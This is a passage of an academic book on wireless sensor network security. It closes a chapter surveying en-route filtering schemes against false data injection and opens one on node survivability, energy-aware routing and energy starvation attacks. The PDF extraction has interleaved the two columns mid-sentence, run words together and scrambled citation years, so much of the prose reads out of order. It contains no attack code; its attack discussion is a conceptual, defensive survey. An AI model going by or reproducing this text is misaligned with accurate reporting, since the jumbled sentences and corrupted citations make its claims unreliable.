dropped by the forwarding nodes, and the few problem, similarly to SEF. Second, since IHA
escaping ones are further rejected at the sink. requires that the messages transmitted from the
base station to a cluster head and from the cluster
Features headtothebasestationfollowthesamefixedpath
IHA scheme is not suitable for the sensor networks
First, SEF suffers from the threshold breakdown with dynamic topology.
problem. Second, SEF is independent of dynamic
topology changes of sensor networks, and hence commutative cipher-based En-route
is robust against node failures and routing path filtering
changes.
As we discussed above, both SEF and IHA schemes
Interleaved Hop-by-Hop suffer from a threshold breakdown problem. To
Authentication solve this problem, a commutative cipher-based
en-routefilteringscheme(YangLu, & was
)0 2 4
presented on the basis of public-key algorithms.
Methodology
Distinguished from SEF, interleaved hop-by-hop Methodology

authenticationZhu ( etal.verifies
)024 , thereports
in a deterministic and an interleaved, hop-by-hop CCEF exploits the typical operational mode of
fashion. In the deployment phase, each node is query-response in sensor networks, and installs
preloaded with a unique ID and keying materials security states in the nodes in an on-demand
that can allow it to establish a pair-wise key with manner. Specifically, in CCEF, each node has a
another node. The nodes form multiple clusters unique ID and is preloaded with a unique node
and each cluster has at least (t + 1) nodes, where t key before deployment. When reports are needed,
the base station sends an encrypted session key

to the desired cluster head and a witness key in verify events claimed to happen in those cells.
plain-text to all forwarding nodes along the path, Each legitimate report carries m distinct MACs,
through a query message. A legitimate report is jointly generated by the detecting nodes using the
endorsed by a node MAC jointly generated by the keys bound to the event’s cell. When an intermedi-
detecting nodes using their node keys, and a ses- ate node receives a report, it retrieves the event’s
sion MAC generated by the source node using the location from the report and checks whether the
session key. Through the usage of a commutative location is in one of its verifiable cells. If so, it
cipher, a forwarding node can use the witness key checks whether it has one of the keys hose indices
to verify the session MAC, without knowing the are carried in the report. If it has such a key, it
session key, and drop the fabricated reports. The recomputes the MAC and compares to the carried
basestationfurther verifies
the node MAC in the one. If the two MACs do not match, the report is
report that it receives, and refreshes the session key dropped. Otherwise, it forwards the report. The
upon detection of compromised nodes. sink performs final verification on the received
reports. It knows all location-binding keys, thus
Features able to verify every MAC in the report.
First, CCEF solves the threshold break down Features

problem. Second, CCEF suffers the dynamic to-
pology problem, similarly to IHA scheme, since First, compared with SEF and IHA schemes, LBRS
it requires the same fixed path for messages inthe threshold breakdown problem,
partly solves
both directions between the base station and the since compromising a certain number of nodes
cluster head. Third, CCEF uses the commutative only enables the attacker to fabricate events “ap-
ciphers that are based on public-key algorithms, pearing” at certain areas without being detected.
which have been reported not suitable for sensor However, it is still far from achieving the expected
networks (Eschenauer & Gligor, 2002). data authenticity requirement: to generate a valid
report on a nonexisting event happening in a cer-
location-based resilient security tain area, the only way is to compromise T nodes
in that area, and otherwise impossible. Second,
To mitigate the threshold breakdown problem LBRS is suitable for the sensor networks with
identified in IHA and SEF schemes, a location- dynamic topology.
based resilient security scheme (Yang et al., 2005)
was proposed which exploited a location-based location-Aware End-to-End data
approach as the fundamental mechanism. security
Methodology Later on, Ren et al. (2006) came up with a loca-

tion-aware end-to-end data security to address
In LBRS, the terrain is divided into a geographic the vulnerabilities in existing security designs,
grid and binds multiple keys to each cell on it. by exploiting the static and location-aware nature
Such keys are termed as location-binding keys. of WSNs.
Eachnodestorestwotypesofkeys.Thefirsttype
is for the local cells within its sensing range, called Methodology
sensing cells. Each node stores one key for each
of its sensing cells. Such keys are used to endorse In LEDS, each node computes three different types
events detected in those cells. The second type of location-aware keys: (a) two unique secret keys
is for a few randomly chosen remote cells, called shared between the node and the sink and used to
verifiable.cells Each node also stores one key for provide node-to-sink authentication; (b) one cell
eachofitsverifiablecells.Suchkeysare key used
shared to
with other nodes in the same cell that

isusedtoprovidedataconfidentiality; andc)( aset

to forwarding nodes) is high. Third, as the authors
of authentication keys shared with the nodes in its discussed in the chapter, LEDS raises some new
report-auth cells and used to provide cell-to-cell typesofattacksspecifictoitsscheme.
authenticationanden-routebogusdatafiltering.All
these keys are computed by each node locally and
independently. In addition, LEDS adopts a (t, T) scHEMEs In HEtErogEnEous
threshold linear secret sharing scheme (LSSS) so sEnsor nEtworks
that the sink can recover the original report from any
t out of T legitimate report shares. Moreover, LEDS In the previous section, we looked at some of the
adopts a one-to-many data forwarding approach, security protection schemes in homogeneous sensor
that is, all reports in LEDS can be authenticated by networks. However, there is another class of sensor
multiple next-hop nodes independently so that no networks, heterogeneous sensor networks, which
reports could be dropped by a single node(s). use two or more type of nodes. It is known that
the presence of heterogeneous nodes in a sensor
Features network helps to increase network lifetime and
reliability. In this section, we present the design of
First, LEDS meets the expected requirement in asinkfilteringschemeSFS) ( (Ma,026a,026b)
terms of resilience, with totally solving the thresh- in a heterogeneous network, showing that the pres-
old breakdown problem. Second, LEDS is suitable ence of heterogeneous nodes in a sensor network
for the sensor networks with dynamic topology. also helps to improve the resiliency.
Dynamic En-Route Filtering Model of a Heterogeneous sensor

network
At the meantime, Yu et al. (2006) presente a dy-
namicen-routefiltering. We consider a heterogeneous sensor network where
two types of sensors are deployed: basic sensor and
Methodology cluster head. A basic sensor is simple, inexpensive
and power-limited, while a CH has more capabilities
In DEF (Yu et al., 2006), a legitimate report is en- on processing and communication, richer power
dorsed by multiple sensing nodes using their own supply, and is more compromise-resilient.
authentication keys generated from one-way hash We regard a target deployment area as a two-
chains. A cluster head (CH) uses a hill climbing dimensional square region with size A2. The sink
approach to disseminate the authentication keys is located at the center (0, 0). The deployment area
of sensing nodes to the forwarding nodes along is divided into C equal size grids (i.e., clusters),
multiplepathstowardsthebasestation. Infiltering
with each grid’s size as a2. The basic sensors are
phase, each forwarding node validates the authen- uniformly distributed across the entire deployment
ticity of the reports and drops those false ones. area. Without loss of generality, we assume that
each CH is deployed at the center of each grid.
Features Each basic sensor is assigned to the nearest CH.
Every basic sensor and CH has a unique identifi -
First, compared with SEF and IHA schemes, DEF cation (ID).
can tolerate a larger number of compromised
nodes. However, DEF scheme still cannot meet sink filtering scheme (sfs)
the expected requirement in terms of resilience, as
LEDS does. Second, LEDS can deal with dynamic The two types of sensors and sink node implement
topology of sensor networks; but the overhead indifferent tasks in SFS. A basic sensor senses events
curred (on disseminating the authentication keys and provides its CH a proof for any aggregation

report it has agreed. A CH collects raw sensing breakdown problem. Second, SFS is adaptive to
data from basic sensors, generates an aggregation the dynamic topology. Third, compared with all
report, and relays the report to the sink node. A the schemes in homogeneous sensor networks, SFS
sink node checks the validity of the carried MACs inheterogeneoussensornetworksismoreefficien
inanaggregationreportandfiltersout theforged
and scalable. Interested readers may refer works by
report. Ma (2006a, 2006b) for more details on resiliency
study and overhead evaluation.
Methodology
We assume that the basic sensors are deployed in conclusIon

a high density. Once a real event occurs, n basic
sensors within the sensing range can sense it. Inthischapter,wepresentedsixen-routefilterin
Instead of communicating directly with the sink, schemes in a homogeneous sensor network, includ-
each basic sensor only communicates with its CH. ing statistic en-route filtering interleavedSEF)
( ,
Each CH collects raw sensing data from the basic hop-by-hop authentication (IHA), commutative
sensors within the cluster, generates an aggregation cipher-baseden-routefiltering CCEF)
(
location- ,
report, and then relays the report to the sink node. based resilient security (LBRS), location-aware
Since the average number of hops each report has end-to-end data security (LEDS), and dynamic
to travel from a CH to the sink in heterogeneous en-routefiltering(DEF).Furthermore,a - sinkfil
sensor networks is definitely much smaller than
tering scheme in a heterogeneous sensor network
that in homogeneous sensor networks, the design is also introduced. Our study demonstrates that
ismoreenergy-saving,efficient,andscalable. exploiting heterogeneity in sensor networks also
The key management for the clusters of hetero- helps to improve the resiliency.
geneous sensor network is as follows. (a) Before
deployment, each sensor (either a basic sensor or
a CH) shares a secret key with the sink. (b) We rEfErEncEs
assume the neighborhood relationship among CHs
is known in advance. Before deployment, each CH Eschenauer, L., & Gligor, V. D. (2002). A key-man-
simply preloads eight pair-wise keys with its eight agement scheme for distributed sensor networks.
immediate neighboring CHs, respectively. The Paper presented at the ACM CCS.
CHs, therefore, organize themselves into a static
ad hoc network. (c) Upon deployment, each basic Ma, M. (2006a). Resilient against report fabrica-
sensor establishes a pair-wise key with its one-hop tion attack in clusters of heterogeneous sensor
neighboring basic sensors; the one-hop pair-wise networks. Paper presented at the IEEE WCNC.
key establishment scheme in LEAP (Zhu, Setia, & Ma,M.60b,
2 ( December)Resilience
. ofsinkfilter-
Jajodia, 2003) is adopted to achieve this goal. (d) ing scheme in wireless sensor networks. Computer
Upon deployment, each CH establishes a pair-wise Communications, 30(1), pp. 55-65. Elsevier
key with every basic sensor within its cluster; the
one-hop (or multi-hop whenever a basic sensor Ren, K., Lou, W., & Zhang, Y. (2006). LEDS: Pro-
cannot reach its CH in a single hop) pair-wise key viding location-aware end-to-end data security in
establishment scheme in LEAP (Zhu et al., 2003) wireless sensor networks. Paper presented at the
is used for this purpose. IEEE INFOCOM.
Yang, H., & Lu, S. (2004). Commutative cipher
Features based en-route filtering in wireless - sensor net
works. Paper presented at the IEEE VTC.
First, SFS meets the expected requirement in terms
of resilience, with totally solving the threshold

Yang, H., Ye, F., Yuan, Y., Lu, S., & Arbaugh, W. Compromised Nodes: Nodes on which an
(2005). Toward resilient security in wireless sensor attacker has gained control after network deploy-
networks. Paper presented at the ACM MobiHoc ment.
(pp. 34-45).
False Data Injection Attack: The type of
Ye, F., Luo, H., Lu, S., & Zhang, L. (2004). Sta- attack when the compromised sensors forge the
tistical en-route filtering of injected false
events that data
do not occur.
in sensor networks. Paper presented at the IEEE
Key Management: The process of managing
INFOCOM.
key materials (e.g., key generation, key distribu-
Yu, Z., & Guan, Y. (2006). A dynamic en-route tion, etc.) in a cryptosystem.
scheme for filtering false data injection - in wire
Message Authentication Code (MAC): It is
less sensor networks. Paper presented at the IEEE
a short piece of information used to authenticate
INFOCOM.
a message.
Zhu, S., Setia, S., & Jajodia, S, (2003). LEAP:
Threshold Breakdown Problem: We say a
Efficient security mechanisms for large-scale
security design has threshold breakdown problem if
distributed sensor networks. Paper presented at
the design is secure against t or less compromised
the ACM CCS.
nodes, but once more than t nodes are compromised
Zhu, S., Setia, S., Jajodia, S., & Ning, P. (2004). the security design completely breaks down, where
An interleaved hop-by-hop authentication scheme tisafixedthreshold.
for filtering of injected false data in sensor net-
Wireless Sensor Network (WSN): The wire-
works. Paper presented at the IEEE Symposium
less networks consisting of small sensors that
on Security and Privacy (S&P).
cooperatively monitor environmental conditions,
such as temperature, humidity, and so forth.
kEy tErMs
Aggregation Report: A data structure that

synthesizes the state of the phenomena that the
wireless sensor network is monitoring.

Chapter XXXIX
Survivability of Sensors with Key
and Trust Management
Jean-Marc Seigneur
University of Genev, Switzerland
Luminita Moraru
University of Genev, Switzerland
Olivier Powell
University of Patras, Greece
AbstrAct
Weiserenvisioned
(19) ubiquitouscomputingwithcomputingandcommunicatingentitieswo
the fabrics of every day life. This chapter deals with the survivability of ambient resource-constrained
wireless computing nodes, from fixed sensor network nodes to small devices carried ou
entities, for example, as part of a personal area network of a moving person. First, we review the assets
that need to be protected, especially the energy of these unplugged devices. There are also a number of
specificattacksthataredescribed,forexample,directphysicalattacks - arefacilitat
ing security perimeter. Finally, we survey the protection mechanisms that have been proposed with an
emphasis on cryptographic keying material and trust management.
IntroductIon momentum. However, one may question whether

or not these computing and communicating entities
Weiser (1991) envisioned a ubiquitous computing will be able to survive in an open environment.
world where intelligent computing and communi- These computing entities are no more protected by
cating devices are pervasive and woven into the a physical security perimeter; foreign, potentially
fabrics of every day artifacts. His vision is being malicious, entities can tamper with them. Another
materialised: the market of large scale sensors challenge for the real deployment of these networks
and hand-held devices networks has been gaining of sensors and portable devices is to provide them
Survivability of Sensors with Key and Trust Management
with enough energy for long term functioning be- bAckground AsPEcts of
cause it is assumed that they are unplugged from nodEs survIvAbIlIty
the main electrical power supply and can rarely
recharge themselves by this means. Any action Inthissection,wefirstdiscusswhatwemeanby
carried out by these entities depletes their energy. nodes survivability, their assets, and especially
In addition to being resource-constrained in terms their energy. Then, we focus on the routing as-
of energy, these entities are resource-constrained set, which is an important asset that enables the
in terms of memory and processing, which limit nodes to communicate beyond their own wireless
what they can do, especially when these entities communication range. It shows that the routing
are small, such as the sensors deployed in sensors has been initially engineered without attackers
networks. in mind, which is also the case for most of the
Usually, sensors are performing two important other enabling mechanisms and assets. However,
types of actions or tasks: they have to sense the there are a number of attacks that can be carried
environmentandtosendinformationout toon aspecific
these assets. We survey them at the end of
target entity, sometimes called sink. For example, the section.
the sink may be an Internet gateway that will
propagate the information for persistent storage node(s) survivability
and analysis. Security problems exist both when
messages are generated and when they are relayed. First, it is important to note we use the plural in
Working most of the time in an unattended envi- the heading of this section, nodes survivability,
ronment without tamper-proof hardware makes the because it emphasises that the scope of the node’s
sensors very vulnerable to attacks. mission may span more than one node. On one
Generally, mobile ad hoc networks (MANETs) hand, it may be a scenario where the survivabil-
are thought to be composed of nodes bigger than the ity of the node itself is more important than the
sensors of sensors networks. Also, whereas sensors survivability of the other nodes. For example, a
areconsideredafter ( theirdeployment) rather
user fixed
who carries a mobile phone in the mountains
concerning their location, MANETs imply that the may be selfish and would not bother forwarding
nodes move. If we assume that the MANET nodes the messages of other users as they are met on the
are also unplugged from the main power supply, way to the top of the mountain. The forwarding
the nodes have also limited energy. Another differ- of a message from another user would deplete
ence between sensors and MANET nodes is that the energy of the mobile phone and endanger the
instead of just having to sense and forward simple survivability of the device and its mission lifetime.
information, MANET nodes are expected to run On the other hand, the mission may be that the
much more complicated operations that surely majority of the nodes survive at the expense of
require more energy than simple tasks. In this thesurvivalofonespecificnode.Itisusuallythe
chapter, we consider all ad hoc networks where the case in sensors networks where the goal is to sense
wireless nodes are resource-constrained, especially and monitor a region thanks to the collaboration
in terms of energy. Thus, as introduced above, the of many nodes. If a part of the monitored region
nodesmaygofromthetinyfixeddeployedsensor is quite active, it is possible that the nodes in this
to the mobile unplugged mobile device. active region take over the work of another node,
In this chapter, we first survey thefor different
example, to forward the sensed information in
assetsoftheseentitiesandthendelve order tointo specific
maximise the lifetime of the monitoring
attacks on these assets. We present further two of the whole region. That type of scenario requires
main protection mechanisms: cryptographic keying that there is some sort of control on the nodes; an
material and evidence-based trust management. authority is needed to guarantee that the nodes will
Finally, we discuss future trends and draw our collaborate and follow the rules. For example, in a
conclusion. military environment, the nodes that are deployed

areconfiguredbeforethedeploymentandBesides wecan being captured by an adversary and

assume that they will all follow the rules (until they removed from the network, the lifetime of the node
are captured or they fail). A military environment and its mission mainly depend on its consumption of
is said to be a controlled environment, its extreme energy. The design of the node is an inherent asset
being an open environment where every node is of the node because both hardware and software
free to behave as it wishes. In the middle of these designs may end up in consuming more or less
extremes,therearescenarioswhereaenergy. selfish node
Current sensor nodes are battery-enabled
may increase its lifetime by sporadically helping devices. The energy consumption of a sensor is
other nodes: the nodes being interdependent. due to the computation and the communication
modules. Energy is depleted mainly by the com-
the Assets underlying the munication module. Radio transmission consumes
survivability most of the energy spent for security mechanisms
and encryption only consumes 3% (Hwang, Lai, &
Asexplainedintheprevioussubsection, thefirst
Verbauwhede, 2004). Thus, minimising security
type of asset underlying the survivability is the transmission is important with regard to energy
survivability of the node or the survivability of the saving. However, sensors are constrained devices
network of nodes. In interdependent settings, the and the security mechanisms available for conven-
neighbouring nodes are an asset that enables the tional networks are not suitable due to their limited
node to achieve more than what it could achieve computational, memory, and energy resources.
alone. An underlying asset is the trustworthiness They are often deployed in hostile environments
of these neighbouring nodes. The node may be with no physical access to nodes after deployment.
able to choose or influence whose nodes are
Thus, theits
sensor lifetime is limited by the initial
neighbours, for example, by moving to another energy of the battery. Different energy harvesting
location or by mere selection (the third section mechanisms are being researched for sensors, such
explains how evidence-based trust management as the use of solar cells, but they are still not very
can be used to optimise the selection process). In common. The user’s mobile computing devices
sensor networks, it is less often assumed that new like personal digital assistants and mobile phones
nodes can be added after the initial deployment of are also battery-powered but they can be more
the nodes. Sensors are mainly used to monitor the easily recharged.
characteristics of a specific fixed area or targets.
While energy recharging and harvesting mecha-
However, in MANET scenarios, when the nodes nisms are put in place, the nodes need energy saving
correspond to devices carried by people, it is clear mechanisms. Usually, energy saving mechanisms
that the nodes can come and go as the people roam are based on the difference of energy consumption
from place to place. If the adjunct nodes and their between the active and the idle states. Energy is
location can be chosen, the survivability of the saved by minimising the fraction of time while the
network of nodes may be prolonged. All the nodes device is active. These energy saving mechanisms
may participate for the survivability of the network are normally targeting the subsystem of the device
of nodes. Therefore, the nodes’ participation can that has the greatest difference between the energy
be considered as an asset. consumption of the two states. Once no application
Another asset for a node is to be highly tam- is running on the device, it is put into a low power
per-proof. However, as said above, nodes in open state, extending the battery life. A sensor node can
environments can be captured and highly tamper- usually be in four different states: transmit, receive,
proof hardware may be too costly. An asset may idle,andsleep.Thesleepstateissignificantlyles
be the possibility to communicate the evidence energy consuming than the other states. Preserv-
of tampering, for example, an alert being sent at ing network longevity is one of the main issues in
time of capture or creating some form of tamper- sensor networks. The topology of the network is
evidence. not known a priori because the nodes are randomly

scattered to a target area. Sensor networks are often energy, the use of security mechanisms may also
dense networks. Not all the nodes are necessary require more storage space, for example, for the
to accomplish a specific request. One method to and may slow down the processes
keying material,
save energy is to put nodes to sleep in a manner due to the additional security steps, such as, en-
that does not interfere with the functionality of cryption, decryption, and signatures.
the network. In a sensor network the lifetime of Besides the above special assets, there are also
the network is more important than each sensor. morebasicsecurityassets,namely,the - confidenti
Thus, the protocols developed for sensor networks ality/privacy, integrity, and availability properties
consider the optimisation of network lifetime. of each node and their messages. When these basic
The topology of the network may be dynamic. assets are compromised, the other assets may be
Nodes may become temporary inactive to save more easily compromised.
their energy or they drain out of battery. At the The list below summarises the different assets
same time, new nodes may be deployed in the same that we have discussed in this section:
area. Energy is limited in the network. However,
the nodes may have to repeatedly communicate • Node-level assets:
with a base station on a hop-by-hop basis. To ° Node mission lifetime:
minimise the energy spent in the network, energy-  Node energy
preserving secure routing protocols (surveyed in • Harvesting source
the following subsection) have been developed. • States and actions management
The communication patterns are concerned with  Node tamper-proof and tamper-evi-
balancing energy consumption and preserving dence
network lifetime and purpose. Usually, the whole ° Node localisation
region needs to be covered by the nodes. The ° Nodemobilityin ( caseofnon-fixed - set
purpose of the network requires that the sensing tings)
coverage works for all localisations. At any loca- ° Node computing performance
tion, the nodes should be able to send the collected ° Node neighbours presence in interde-
data to the base station. Energy saving should not pendent settings
deteriorate the connectivity and the coverage of the ° Node communication:
network. An energy optimisation scheme should  Ability
alsomaintaintheinitialcoverage.Energyefficient • Reception
schemes group sensors in different sets that are • Transmission
alternatively active (Cardei, 2005; Ramchurn, • Coverage range
Jennings, Sierra, & Godo, 2004).  Confidentiality
Another solution is to enforce clustering algo-  Integrity
rithms (Handy, 1995). An example of energy at  Speed
the nodes level occurs with cluster-based sensors • Network of nodes-level assets:
network topology. In this case, energy efficient ° Network mission lifetime
routing protocols use hierarchical structures like ° Deployment of new nodes
clusters among the nodes forming the network. ° Nodes participation and trustworthi-
The nodes in the cluster only communicate with ness
the cluster head. The cluster head is the only one ° Network connectivity, performance and
to communicate with the other cluster heads and coverage
provides aggregation of data for the nodes form-
ing the cluster. the routing Asset case-study
The nodes that are not cluster head may receive
the information later. The responsiveness of the The nodes can use their wireless link to directly
node, concerning computation and communication, communicate with the other nodes in range. Some-
is also important. In addition to consuming more times the nodes can increase their transmission

energy to reach farther nodes. However, as said In military MANETs, it is often assumed that the
above, communication tasks use a lot of energy; deployed nodes are controlled; it is a controlled
for example, if we assumes Friss’ (1946) free- environment where it is understandably supposed
space attenuation, the energy needed for wireless that nodes are not free to do whatever they can do.
transmission over a distance d is proportional to In open MANETs, where any user’s node can come
d square. Thus, the nodes may save energy by and go depending on the user’s will, the nodes
using other closer nodes to forward their message might not follow the rules and they challenge the
to farther nodes. In addition, if the nodes cannot correct functioning of these routing protocols.
increase their transmission energy to reach a Thus, the researchers had to revise their protocol
specific far-away node, the only remaining - solu (not to say restart from scratch) because
approach
tion is to use intermediate nodes to forward the all was working well under the assumption that
message. It is why routing algorithms have been the nodes do collaborate, but in open MANETs,
researched. In this subsection, we survey the where nodes are owned by free people, assuming
most well-known protocols that allow the that everyone collaborates is simply not realistic. In
nodes to exchange messages. We start by the 2001, the conclusion was that security in MANETs
MANET protocols and then the protocols said is particularly difficult due to their specificit
to be specific to sensor networks, which (Hubaux,are
Buttyán,Capkun,
& vulnerability
: ) 1 02
explicitly energy-aware. of channels and nodes (i.e., less physical security);
resource-constrained nodes; high probability
MANET Routing Protocols of absence of infrastructure; and dynamically
changing topologies and high uncertainty. An
Maltz (2001) depicts the history of MANETs. The interesting issue is the question of collaboration,
firstsignificantprojecttowardsMANETs iscalled
which is vital for some MANETs to stay up: the
the DARPA-sponsored military packet radio net- nodes are neither dependent nor independent but
work (PRNET) in 1972. Now, MANETs seem to interdependent.Iftoomanynodesaretooselfish,
be used on battlefields. The goal of researchers, the overall availability is endangered (Miranda &
like Maltz, was to outperform the performance Rodrigues, 2003).
of the military protocols. They reachedefficient
and good performance for routing in MANETs Sensors Network Protocols
with ad hoc on-demand distance vector routing
(AODV) (Perkins & Royer, 1999) or dynamic As mentioned above, in sensors networks, the de-
source routing (DSR) (Maltz, 2001). ployed nodes are usually supposed to collaborate.
Both AODV and DSR are reactive routing However, due to their small size and the assump-
protocols because they compute the route between tion that they can never be recharged, the MANET
two nodes only when the route is needed, that is, protocolsarenotsufficienttooptimisetheuse
‘on demand.’ In doing so, there are far fewer tasks the energy of the nodes. This is why other research-
to be carried out because all the routes do not have ers have researched new routing protocols with an
to be maintained all the time. It is very important emphasis on energy consumption optimisation.
from an energy point-of-view in mobile settings Energy-aware routing protocols explicitly take
where the nodes come and go very quickly and into account the energy consumption as a param-
where the routing information would need to be eter. This subsection surveys seven of these new
updated very often. However, neither AODV nor protocols that use one or several of these following
DSRintegratefurtherspecificmechanisms - energyto mi basic techniques:
saving
nimise the energy consumption along the route.
Another limitation comes from the fact that • Keeping short range transmissions
Maltz and colleagues designed their protocols with • Aggregating data
the same assumption as for military MANETs. • Buildingefficientpaths
0
• Switching between sleep/awake states clustering technique: the ejecting nodes are cluster
• Efficientlycontrollingmulti-paths heads and the cluster members are nodes which
propagate towards the ejectors. The cluster heads
During the set-up phase of the minimum cost (and thus the clusters) are automatically updated
forwarding algorithm (MCFA) (Ye, Chen, Liu, & by the distributed algorithm.
Zhang, 2001), each node initiates its least cost to the The low-energy adaptive clustering hierarchy
sinkestimatedtobeataninfinitedistance. (LEACH)The sink1995) is a more well-known
(Handy,
broadcasts to its neighbours a setup message. Each distributed randomised cluster formation algo-
of the neighbours computes and updates its least rithm. Many more complicated and optimised
cost estimate to the sink and eventually broadcasts algorithms that exist in the literature have been
further to its own neighbours. When receiving a inspired by LEACH. LEACH is based on parti-
broadcast message, a node computes its new least- tioning the network into clusters. It features two
cost estimate. If it is lower than the current least distinct phases:
cost estimate, the node updates it and broadcasts
its new estimated least cost to its neighbours, and 1. Cluster formation: Cluster heads are self-
so on and so forth. In order to avoid collision as elected according to a very simple random
well as duplication of unnecessary message, that is, rule: each node decides to become a cluster
inordertooptimisetheooding fl involved,MCFA
head with probability p, where p depends on
introduces a back-off mechanism which is basically a threshold value. This threshold function is
a timeout before propagating the updated values dependent of parameters such as the remain-
of the estimated least cost. During the propaga- ing energy, the time elapsed since the network
tion phase, when a node needs to send a message started, and the number of times it has been a
to the sink, it broadcasts to its neighbours. When cluster head before. Thus, energy balancing
a node receives a message, it checks if it is on the ispossiblethroughthefine-tuning - ofthepa
least cost path, and if so, propagates the message rameters. Once self-elected, the cluster heads
further. Otherwise it just drops the message. advertise themselves to noncluster heads by
Gradient-based routing (GBR) (Schurgers & broadcasting an announcement message.
Srivastava, 2001) is somehow similar to MCFA. It Noncluster head nodes then decide to which
proposes to slide messages along a gradient towards cluster they will attach themselves. Basically,
the sink. GBR is a general scheme; it proposes a they attach themselves to the closest cluster
few gradients but it is open to other possible gradi- head, although closest could have different
ents. The gradient can be computed similarly as in meanings. Once the cluster head is aware of
MCFA, that is, using the back-off mechanism. If one all of its cluster members, it computes a time
wants to introduce the hop-count in the gradient, division multiple access (TDMA) scheme and
the hop-count is included in the gradient formula. assigns a time slot to each of the members
MIX (Powell, Jarry, Leone, & Rolim, 2006) is a of the cluster. The cluster members are only
variant of GBR that allows the node to eject a mes- allowed to transmit data to the cluster head
sage directly to the sink in case of high remaining during the time slot that they have been
energy on the current node compared to the energy assigned to. Hence, no message collision
remaining on its neighbours. In MIX, a sensor occurs.
can choose to eject a message when all its short- 2. Data propagation phase (once the clusters
range neighbours have lower energy than itself. To have been formed): Data are sent by the
eject means that the sensor increases the power of cluster members directly to their cluster
transmission to be able to reach the base station in head. The cluster head then aggregates the
one transmission. As said above, the energy spent data before sending them directly to the sink.
increases a lot, nonlinearly, with the distance. The Other protocols inspired by LEACH propose
ejection feature of MIX can be seen as a dynamic to run a more sophisticated algorithm than

direct transmission to the sink by using an- nodesdecidetosendREQmessagesbyanalysing

other routing protocol on a subgraph of the the ADV message which is assumed to contain the
communication graph, sometimes called a necessary information to take this decision. The
‘backbone network,’ where nodes are typi- actual encoding of the ADV message is application
specific and not specified by the SPIN protocol.
cally the cluster heads. The distributed cluster
formation phase has to be rerun from time to Variants of SPIN offer different optimisation for
time in order to avoid early energy depletion different contexts. For example, nodes can decide
of cluster heads. to stop participating when they believe that they
do not have enough energy to complete all stages
The directed diffusion (DD) (Intanagonwiwat, of the protocol.
Govindan, Estrin, Heidemann, & Silva, 2003) pro- Thefinalprotocolthatwe surveyis
probabilistic
tocol is also very famous but a bit more complicated forwarding (PFR) (Chatzigiannakis, Dimitriou,
than LEACH. It works roughly in the following Nikoletseas, & Spirakis, 2006). It uses the following
way. The sink(s) sends interests (consisting of at- approach which is common in routing protocols.
tribute value pairs) which are ooded fl across
In order to the
ensure robustness (due to link failure,
network. The sources are being discovered as the message collision, etc.), data are propagated in a
nodes are capable of satisfying the interests. In a multipath way. However, the total number of paths
second stage, the gradients are being set (the exact has to be controlled. In PFR, it is assumed (although
way in which gradients are being set is application this assumption can be relaxed) that the angle of
specific)Different
. gradientspermittobuild receptionroutes
as well as the direction to the destination
between the sources and the sink with different of a message can be computed. For example, this
properties, for example, high robustness, low assumption is possible in a localised network. Us-
latency, low energy cost, and so forth. Informa- ing this information and by piggy-backing/adding
tion is propagated along the paths following the O(1) bits of information to the message, the nodes
gradients. Energy can be further spared by carry- can probabilistically decide to forward or drop the
ing-out network data-aggregation as well as using message. The messages are propagated along a
caching techniques. DD seems to be very suitable multipath beam whose width can be controlled by
for the so called continuous monitoring application a parameter of the algorithm. The fact of being able
domain (as opposed to event driven monitoring), to control the width of the beam enables the control
because there is a cost in establishing the routes of the energy cost overhead implied by multipath
(or interests gradients, more precisely), and once routing, and the fact of having a multipath beam
they have been established they should be used for ensures the robustness to link failure.
some time, that is, continuously. Inthenextsubsection,wecoveraspecificform
In the sensor protocols for information via of failure, namely, failure due to malicious activi-
negotiation (SPIN) (Kulik, Heinzelman, & Bal- ties, also known as attacks.
akrishnan, 2002), data are disseminated throughout
the network, assuming that each sensor node is a survey of the Attacks on the nodes
potentialsink.ThisisparticularlyAssets efficientinthe
case of mobile networks. The protocol works in
the following way. When a node detects an event, Above, we have surveyed the protocols that have
it sends an ADV message advertising the detected been proposed for routing. These protocols are more
event. The nodes receiving the ADV decide if or less energy-aware. However, most of the times
they are interested in the information, and if so, these protocols assume that there is no attacker. As
send a request (REQ) message, following which we are moving to a ubiquitous computing world,
the actual data will be sent. The idea is to avoid assuming that there is no attacker is unrealistic be-
unnecessaryooding fl oflongdatamessages inthe
cause thenodes are deployed in open environments
network when the information is redundant. The where anybody can deploy nodes or try to tamper

with any nodes. We consider the cost of a physical consumption. The attack may be detected by the
attack as low because the nodes are assumed to owner because the battery is expected to have a
not have significant tamper resistance due
certain to the
lifetime. Ultimately, the measure of this
cost of such protection for devices that are sup- attack may be the report between the real and
posed to be affordable for large scale deployment the expected lifetime of the battery. It has been
(Pirretti, Zhu, Narayanan, McDaniel, Kandemir, reported that for mobile devices the report may
& Brooks, 2005). In a node capture/tampering at- be from one to two orders of magnitude (Pirretti
tack, an adversary has physical access to the node. et al., 2005). Martin et al. (2004) identify three
Current security solutions are evaluated by taking types of sleep deprivation attacks on mobile de-
into account the resistance of the network to nodes vices. In a service request power attack, a device
capture, that is, the number of nodes needed to be must repeatedly execute a network service on a
captured in order to corrupt the entire network. remote entity. Even if the service is not available,
Time is the factor used to evaluate the attacks that the process of authentication consumes time and
are in progress. energy. Another type of power attack may be
Another type of attack may especially target the to request the devices to repeatedly execute an
energy asset. That form of attack is usually called energy-hungry task. On mobile devices, power
the energy starvation attack. For example, Martin, attacks may be detected by scanning software
Hsiao, Ha, and Krishnaswami, (2004) depict a that compares the current energy consumption to
denial-of-service attack targeting battery powered normal energy consumption. On small sensors, it
devices. Its purpose is to drain out the battery of may be infeasible to run such scanning software.
the device, for example, by obliging the nodes to Other solutions analyse the energy consumption
consume more energy than necessary. In the case pattern because power attacks modify the energy
of mobile computing devices, the attack leads to consumption signature of the applications. Another
an inoperable device. It may only be temporary solution may be to define and impose an energy
for a mobile device but it is usually not the case limit for an application or a task.
in sensors networks where the nodes cannot be The nodes executing important tasks, like
recharged. In addition, the inoperability of several cluster heads, are perfect targets to initiate stronger
sensors can disrupt the functionality of an entire attacks over the other nodes in the cluster. These
network region. An energy starvation attack may attacks are prevented by preventing the misbe-
prevent the device from entering into its low power having nodes from becoming a cluster head. The
state, thus increasing the time while the device is solution evaluated by Pirretti et al. (2005) as the
active. This attack can be carried out in the case of best to prevent this type of attack is a hash-based
the use of energy saving schemes. As said above, cluster head selection. The cluster head does not
an energy saving scheme schedules for each node decide itself to be the next cluster head, but it is
an awake/sleeping cycle. In a sleep deprivation selected by random vote by the neighbours. This
attack a node is forced to remain in the awake attack can be categorised as topologically-inspired
state. We start by two types of energy starvation attack (Seigneur, 2005), where the knowledge of
attacks.Thefirsttypeisthesleep - deprivation
